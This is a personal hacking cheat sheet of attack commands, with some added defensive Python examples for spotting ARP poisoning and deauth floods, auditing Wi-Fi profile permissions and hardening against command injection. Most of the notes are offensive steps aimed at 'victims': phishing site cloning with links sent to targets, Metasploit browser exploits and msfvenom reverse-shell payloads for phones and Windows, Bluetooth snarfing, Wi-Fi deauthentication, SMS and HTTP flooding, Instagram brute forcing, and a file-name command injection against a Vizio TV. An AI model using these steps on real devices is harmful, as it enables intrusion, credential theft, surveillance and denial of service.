hackingNotes.txt
CURRENT WIFI DEVICES CONNECTED
write: " netdiscover " <--- the longer it runs, the more IPs it discovers
NETDISCOVER QUICK SCAN
avoids nmap scan block COD has ...?
netdiscover -r 10.6.83.0/24
LINUX CHECK RUNNING APPS
write - "top"
GOOGLE CHROME
- "google-chrome --no-sandbox"
OPEN FLIPPER ZERO APP
write: flipper
INSTALLING FIRMWARE FOR FLIPPER
- go to firmware github
- find .tgz folder and download
- on qFlipper app homepage click "install from file"
- look for downloaded .tgz folder in file explorer
HOLDING MULTIPLE FIRMWARES ON FLIPPER ZERO
- on qFlipper go to sd card file explorer
- find "/update" folder
- this folder holds all downloaded custom firmwares
- make sure to extract the zipped .tgz file so you'll have its actual folder ready locally
- drag and drop .tgz folders here
SWAP FIRMWARES FROM FLIPPER DEVICE
- on flipper zero device find browser by pressing down then left
- go to /update folder
- select custom firmware
- navigate to the "update" file
- run update file
UPGRADE ALL PIP PACKAGES (powershell)
pip list --outdated
pip freeze | %{$_.split('==')[0]} | %{pip install --upgrade $_}
GIT CLI ACCOUNT CREDENTIALS
go to github developer settings in the settings tab
generate personal auth token
within CLI type - git config --global credential.helper cache
now make a git command like push or setting remote
git will prompt you for your username and auth token one last time
MYSQL START SERVER COMMANDS:
service mysql start
mysql -u root -p
FIND SAVED WIFI PASSWORDS
cd /etc/NetworkManager/system-connections
ls
cat <wifi name file>
"look for value - psk "
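Since the psk value sits in clear text in those profile files, the only thing protecting it is file ownership and mode. The script below is an added example (not part of these notes) that audits a NetworkManager profile directory and reports any profile readable or writable by group/others, or not owned by the expected uid. The default path is NetworkManager's real directory; the two profiles written by demo() are constructed samples in a temp dir.

```python
"""Audit permissions on saved NetworkManager Wi-Fi profiles (added example)."""
import os
import stat
import tempfile
from dataclasses import dataclass, field

NM_DIR = "/etc/NetworkManager/system-connections"  # NetworkManager's default profile directory


@dataclass
class Finding:
    path: str
    mode: str              # octal mode string, e.g. "0644"
    owner_uid: int
    problems: list = field(default_factory=list)


def check_profile(path: str, expected_uid: int = 0) -> Finding:
    """Inspect one profile file. `problems` is empty when the file is locked down."""
    st = os.stat(path)
    perm = stat.S_IMODE(st.st_mode)
    problems = []
    if perm & (stat.S_IRGRP | stat.S_IROTH):
        problems.append("readable by group/others (expected 0600)")
    if perm & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("writable by group/others")
    if st.st_uid != expected_uid:
        problems.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    return Finding(path, f"{perm:04o}", st.st_uid, problems)


def audit_dir(directory: str = NM_DIR, expected_uid: int = 0) -> list:
    """Audit every regular file in `directory`; returns only Findings that have problems."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            f = check_profile(path, expected_uid)
            if f.problems:
                findings.append(f)
    return findings


def demo() -> list:
    """Constructed sample: one tight (0600) and one loose (0644) profile in a temp dir.
    The owner check is relaxed to the current user so only the mode problem fires."""
    d = tempfile.mkdtemp(prefix="nm-audit-")
    profiles = {"HomeWifi.nmconnection": 0o600, "CoffeeShop.nmconnection": 0o644}
    for name, mode in profiles.items():
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("[wifi-security]\nkey-mgmt=wpa-psk\npsk=constructed-sample-passphrase\n")
        os.chmod(path, mode)
    return audit_dir(d, expected_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print(f.path, f.mode, "; ".join(f.problems))
```

Run audit_dir() with no arguments as root to check the real directory; NetworkManager itself writes profiles as 0600 root-owned, so anything flagged was loosened by hand or by a backup/restore.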
MONITOR WIFI GUI:
etherape
SITE CLONING ATTACK
CMD: setoolkit
choices - [1 , 3 , 2 ]
now input the ip address of your computer
copy log in web page of cloned site
allow user to go onto browser and type in your IP address
HAS TO BE ON SAME WIFI
BEST USE CASES
show victim phone and say log in...
SPARROW WAR DRIVING:
"cd into folder"
./sparrow-wifi.py
RUBBER DUCKY :
"cd into folder"
cd USB-Rubber-Ducky/Encoder/
java -jar encoder.jar -i input_payload.txt -o inject.bin
METASPLOIT IOS HACK COMMANDS:
service postgresql start
msfconsole
use exploit/apple_ios/browser/safari_libtiff
show options
set lport 8080 (whatever SRVPORT was)
"Open new terminal"
ifconfig
*get local network ip address
"back to METASPLOIT terminal"
set lhost <local network IP ADDRESS> (192.168.1.13)
"new terminal"
curl ipinfo.io/ip
*get the ip for next
"METASPLOIT"
set SRVHOST *IP ADDRESS* (131.150.163.82)
set SRVPORT 8080
exploit
set reverselistenerbindaddress 1
METASPLOIT ANDROID HACK COMMANDS:
service postgresql start
msfconsole
use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST 192.168.1.13
set URIPATH /
set LHOST 192.168.1.13
set LPORT 4444
set VERBOSE true
set ReverseListenerBindAddress 192.168.1.13
set ReverseListenerBindPort 4444
run
"change http link on bitly and get victim to use"
REFERENCE TO SESSIONS -https://www.hackingarticles.in/msfvenom-tutorials-beginners/
EGGSHELL IOS HACK :
"cd into folder"
python eggshell.py
bash for terminal hacks
https://kalilinuxtutorials.com/eggshell-remote-administration-tool/
LAZY SCRIPT START:
"cd into folder"
./l
SHERLOCK:
"cd into folder"
python3 sherlock.py seanhannity -r --print-found
GHOST ANDROID DEBUGGER MODE HACK :
"cd into folder"
"cd into ghost"
python3 ghost
KISMET WIFI MONITORING:
'cd to folder'
airmon-ng start wlan0
kismet -c wlan0mon
WHEN FINISHED - airmon-ng stop wlan0mon
PHONEINFOGA:
"cd into folder"
python3 phoneinfoga.py -n 16309232300
NEXPHISHER SITE CLONINGs:
bash nexphisher
"choose a website to clone"
"select ngrok"
"send link to victim"
ANONYMOUS IP ADDRESS:
service tor status
"if not active"
service tor start
proxychains <PROGRAM NAME>
BLUETOOTH HACKS:
hcitool scan
"grab victim mac address"
sdptool browse <mac address>
OR
btscanner <---- MAKE SURE FULL SCREEN CONSOLE
BLUESNARFER:
hcitool scan
"grab mac address"
l2ping <mac address>
"make sure you get a ping"
"use above btscanner to find channel to connect with"
bluesnarfer -r 1-100 -C 8 -b <mac address>
CARWHISPERER:
"cd into carwhisperer-0.2"
hciconfig hci0 class 0x50204
hcitool scan
"Find mac address"
l2ping <mac address>
"make sure you get a ping"
./carwhisperer hci0 out.raw recording.raw <mac address>
LAZY SCRIPT:
"cd into folder "
run ---> ./l
-Find router login page: options 20 , 8
-change mac : option 3
-public ip address - option 7
INSTAGRAM:
-instax <insta brute force hack>:
service tor start
bash instax.sh
"follow prompts"
FILENAME.lst
GEOLOCATE IP ADDRESS:
cd into lscript
./l
option 19
enter ip address
GHUNT:
'cd to folder'
python3 hunt.py <Gmail Email>
MONITOR MODE
iwconfig
ifconfig wlan0 down
airmon-ng check kill
airmon-ng start wlan0
STOP MONITOR MODE WHEN FINISHED
- airmon-ng stop wlan0mon
- ifconfig wlan0 up
(resetting pc will bring back wifi)
MAN IN THE MIDDLE ATTACK (webrowser)
nmap -sn <your ip address>/24 your ip = "192.168.1.102" (the "/24" covers every address in 192.168.1.0-192.168.1.255; -sn is a ping sweep only, it scans no ports)
^ you can also use netdiscover to find victims ^
ettercap -T -S -i wlan0 -M arp:remote /<your ip>// /<target ip>//
run wireshark on new terminal
select wlan0
ip.addr== <victim ip> && http
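The ettercap line above works by poisoning the victim's ARP cache so the attacker's MAC answers for the gateway IP. On the defender side the tell-tale is one IP being claimed by two different MACs within a short window, or a pinned gateway MAC changing. The detector below is an added example (not from these notes); the ARP replies fed in by demo() are constructed records, and the MACs are made up.

```python
"""Detect ARP cache poisoning from a stream of ARP replies (added example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float   # capture time in seconds
    ip: str     # sender protocol address: the IP this reply claims
    mac: str    # sender hardware address: the MAC claiming it


class ArpSpoofDetector:
    """Tracks which MACs have claimed each IP and alerts on conflicts."""

    def __init__(self, trusted=None, window: float = 60.0):
        # Optional static IP -> MAC pins (e.g. the gateway), compared on every reply.
        self.trusted = {ip: m.lower() for ip, m in (trusted or {}).items()}
        self.window = window                   # seconds a claim stays "live"
        self.claims = defaultdict(dict)        # ip -> {mac: last_seen_ts}
        self.alerts = []

    def observe(self, r: ArpReply) -> list:
        mac = r.mac.lower()
        new = []
        # Rule 1: a pinned address answered by a different MAC.
        if r.ip in self.trusted and self.trusted[r.ip] != mac:
            new.append(f"{r.ip} claimed by {mac}, trusted MAC is {self.trusted[r.ip]}")
        seen = self.claims[r.ip]
        # Forget claims older than the window so DHCP lease reuse is not flagged.
        for stale in [m for m, t in seen.items() if r.ts - t > self.window]:
            del seen[stale]
        # Rule 2: two different MACs claiming the same IP inside the window.
        others = sorted(m for m in seen if m != mac)
        if others:
            new.append(f"{r.ip} claimed by {mac} and {', '.join(others)} within {self.window:g}s")
        seen[mac] = r.ts
        self.alerts.extend(new)
        return new


def demo() -> list:
    """Constructed replies: a gateway, one host, then a poisoner impersonating both."""
    gateway, host, attacker = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "de:ad:be:ef:00:01"
    det = ArpSpoofDetector(trusted={"192.168.1.1": gateway}, window=60)
    replies = [
        ArpReply(0.0, "192.168.1.1", gateway),        # genuine gateway
        ArpReply(1.0, "192.168.1.102", host),         # genuine host
        ArpReply(2.0, "192.168.1.1", attacker),       # poisoned: attacker "is" the gateway
        ArpReply(3.0, "192.168.1.102", attacker),     # poisoned: attacker "is" the host
        ArpReply(100.0, "192.168.1.50", "aa:bb:cc:00:00:10"),
        ArpReply(200.0, "192.168.1.50", "aa:bb:cc:00:00:11"),  # 100s later: lease reuse, no alert
    ]
    for r in replies:
        det.observe(r)
    return det.alerts


if __name__ == "__main__":
    for a in demo():
        print("ALERT:", a)
```

Feed it from a real capture by mapping each ARP reply (opcode 2) to an ArpReply; the window keeps normal DHCP churn quiet while a poisoner, which must keep re-sending to hold the cache, trips it within seconds.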
COMMAND INJECTION vizio
touch 'file & cd & ls &.tgz' && curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
or
name a file --> "file & cd & ls &.tgz"
curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
SSH
from windows ---> linux
linux - "sudo service ssh start"
windows = " ssh root@192.168.1.102 " ------> " ssh root@<wifi ip address> "
BOOT OFF WIFI
start monitor mode
airmon-ng start wlan0
find the BSSID (router mac address) that you're connected to
airodump-ng wlan0mon
home router: ' 60:38:E0:8D:6D:2F '
rootz - 02:9F:C2:71:68:3A
find the connected device we want to attack
airodump-ng wlan0mon --bssid [routers BSSID here] --channel [routers channel here]
airodump-ng wlan0mon --bssid 60:38:E0:8D:6D:2F --channel 11
boot the device
aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon
aireplay-ng --deauth 0 -c E0:8E:3C:39:18:82 -a 02:9F:C2:71:68:3A wlan0mon
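aireplay-ng --deauth 0 sends an endless stream of forged deauthentication frames; a healthy network sends a handful per client per session. Counting deauth/disassoc frames per (BSSID, client) in a sliding window separates the two, and 802.11w (Protected Management Frames) is the mitigation, since it lets the client discard unauthenticated deauth frames. The detector below is an added example (not from these notes); the frames in demo() are constructed records with made-up MACs.

```python
"""Flag deauthentication floods in a sequence of 802.11 management frames (added example)."""
from collections import defaultdict, deque
from dataclasses import dataclass

DEAUTH = 0x0c     # management frame subtype: deauthentication
DISASSOC = 0x0a   # management frame subtype: disassociation
BEACON = 0x08


@dataclass(frozen=True)
class MgmtFrame:
    ts: float
    subtype: int
    bssid: str
    dst: str   # client MAC, or ff:ff:ff:ff:ff:ff for broadcast


class DeauthFloodDetector:
    """Alert once per (BSSID, client) when deauth/disassoc frames exceed a rate."""

    def __init__(self, threshold: int = 10, window: float = 1.0):
        self.threshold = threshold
        self.window = window
        self.recent = defaultdict(deque)   # (bssid, dst) -> timestamps inside the window
        self.alerted = set()

    def observe(self, f: MgmtFrame):
        if f.subtype not in (DEAUTH, DISASSOC):
            return None
        key = (f.bssid.lower(), f.dst.lower())
        q = self.recent[key]
        q.append(f.ts)
        # Slide the window: drop timestamps older than `window` seconds.
        while q and f.ts - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return f"deauth flood: {len(q)} frames in {self.window:g}s from {key[0]} to {key[1]}"
        return None


def analyse(frames) -> list:
    det = DeauthFloodDetector(threshold=10, window=1.0)
    return [a for a in (det.observe(f) for f in frames) if a]


def demo() -> list:
    """Constructed capture: one normal deauth, a 40-frame flood at 20 frames/s, one beacon."""
    ap, victim = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"
    frames = [MgmtFrame(0.5, DEAUTH, ap, victim)]                                   # client roamed away
    frames += [MgmtFrame(30.0 + i * 0.05, DEAUTH, ap, victim) for i in range(40)]  # the flood
    frames += [MgmtFrame(35.0, BEACON, ap, "ff:ff:ff:ff:ff:ff")]                   # ignored
    return analyse(frames)


if __name__ == "__main__":
    for a in demo():
        print("ALERT:", a)
```

Broadcast deauths (dst ff:ff:ff:ff:ff:ff) get their own key, so a flood aimed at every client on the BSSID is caught as well; tune threshold and window to the roaming behaviour of your own network.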
QUACK SPAMMER ddos:
"cd into folder"
SMS
quack --tool SMS --target 15554443333 --timeout 10 --threads 10
HTTP
quack --tool HTTP --target http://example.com/ --timeout 10 --threads 10
TCP
quack --tool TCP --target 192.168.1.100:80 --timeout 10 --threads 10
msfvenom android apk attack
192.168.1.66 find local ip address
- msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw -o test.apk
'''
have buddy download the apk
then run steps into console.
'''
- msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
FINDING OPEN SSH PORTS
ifconfig | grep inet
grab wifi ip
'192.168.1.102'
get the ip range
ipcalc <current wifi IP>
ipcalc 192.168.1.102
"192.168.1.0/24 " <--- the range is the /24 to identify all
scan network
nmap <ip range> -p <port> --open
nmap 192.168.1.0/24 -p 22 --open
METASPLOIT / MSFVENOM
-first make a file that will be uploaded onto victim using msfvenom
-then open up msfconsole and run the exploit file from their lib of exploits
*this script will start a server
-now once the victim runs this new file, you will gain access using the msfconsole's server
IOS meterpreter
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
msfconsole -qx "use exploit/multi/handler; set payload apple_ios/aarch64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
chmod +x out
brew install ldid
ldid -S out
Transfer it to the jailbroken device and run it (via ssh)
Verify you get a session
Verify webcam_stream/snap works
MSFVENOM TUTORIAL https://blackhattutorial.com/msfvenom-tutorials-for-beginners/
run command to create file onto the desktop...
file needs to be sent to victim
- msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
once bind_tcp.exe has been sent to the victim, run following commands on MSFCONSOLE
- use exploit/multi/handler
- set payload windows/meterpreter/bind_tcp
- set rhost xxx.xxx.xxx.xxx
- set lport 4444
- exploit
videos to see
https://www.youtube.com/watch?v=E2vjovsX4-Q
https://www.youtube.com/watch?v=YRm-St0bJhU
https://www.ehacking.net/2020/04/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux.html
https://www.youtube.com/watch?v=4rfwO-76T1M
https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/
____________________________________________________________________
VIZIO SERVER IP ENDPOINT FILE INJECTION
file & cd & cd & cd & pwd &.tgz
change both inputs on touch and injection
COMMAND INJECTION vizio
one liner --> touch 'file & cd & ls &.tgz' && curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
or
name a file --> "file & cd & ls &.tgz"
type --> curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
PROCEDURE
nmap local area network to find vizio tv
find what port <ip>:<port>/install accepts or rather blocks connection
you'll notice that it is an unauthorized denial... not a not found
after gaining intel on ip and port run attack
touch 'file & <CMD> & <CMD> &.tgz' && curl -F scpl_tgz_package=@./'file & <CMD> & <CMD> &.tgz' "https://<VICTIM LOCAL IP>:7345/install" -k
PYTHON CODE
you could essentially write a python file in a loop that asks for commands and create files that curl to victim server and then display output... then delete attack command file
OUTPUT
cast_cacert.pem
lighttpd.conf
restapp.fcgi
scpl-server.pem
scpl.sh
static
ATTACKING CMD STRING file name
file & cd & pwd &.tgz
change both inputs on touch and injection
make sure to delete files you create with attacking command string as the name
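The two COMMAND INJECTION vizio sections above describe one bug shape: an upload endpoint takes the client's file name and splices it into a shell command, so '&' in the name becomes extra commands. The block below is an added example (not the TV's firmware and not code from these notes) that contrasts that vulnerable builder with a hardened one: allow-list validation of the name, then an argv list handed to subprocess with no shell. UPLOAD_DIR and INSTALL_DIR are hypothetical placeholders; the names in demo() are constructed, apart from the page's own '&' string.

```python
"""Unsafe vs hardened handling of an uploaded package name (added example)."""
import re
import subprocess

UPLOAD_DIR = "/tmp/uploads"   # hypothetical staging directory for uploaded packages
INSTALL_DIR = "/opt/apps"     # hypothetical install target
# Allow-list: plain characters only, must end in .tgz; '/' is excluded, so no path traversal.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.tgz$")


def build_install_command_unsafe(filename: str) -> str:
    """VULNERABLE pattern: the client-controlled name is spliced into a shell string.
    Any shell metacharacter in the name (&, ;, |, $(), backticks) becomes extra commands
    once this string reaches os.system() or subprocess with shell=True."""
    return f"tar xzf {UPLOAD_DIR}/{filename} -C {INSTALL_DIR}"


def validate_package_name(filename: str) -> bool:
    """Allow-list check on the bare name. Reject rather than try to strip or escape."""
    return SAFE_NAME.match(filename) is not None


def build_install_command_safe(filename: str) -> list:
    """Hardened: validate first, then build argv as a list. The name is a single
    argument to tar and is never parsed by a shell, so metacharacters are inert."""
    if not validate_package_name(filename):
        raise ValueError(f"rejected package name: {filename!r}")
    return ["tar", "xzf", f"{UPLOAD_DIR}/{filename}", "-C", INSTALL_DIR]


def run_install(filename: str) -> int:
    """Execute the hardened command. shell=False (the default for a list) is the point."""
    return subprocess.run(build_install_command_safe(filename), check=False).returncode


def demo() -> dict:
    """Constructed names: a normal package, the '&' shape from the notes above, and a
    traversal attempt. Maps each name to whether the hardened builder accepts it."""
    names = ["update-1.2.tgz", "file & cd & ls &.tgz", "../etc/passwd.tgz"]
    result = {}
    for n in names:
        try:
            build_install_command_safe(n)
            result[n] = True
        except ValueError:
            result[n] = False
    return result


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name!r}: {'accepted' if ok else 'rejected'}")
    print("unsafe string would be:", build_install_command_unsafe("file & cd & ls &.tgz"))
```

The order matters: validation rejects the bad name before any command is built, and even a name that slipped past validation could not break out, because the list form never goes through a shell. Logging each rejection with the offending name gives a cheap detection signal for probing of the endpoint.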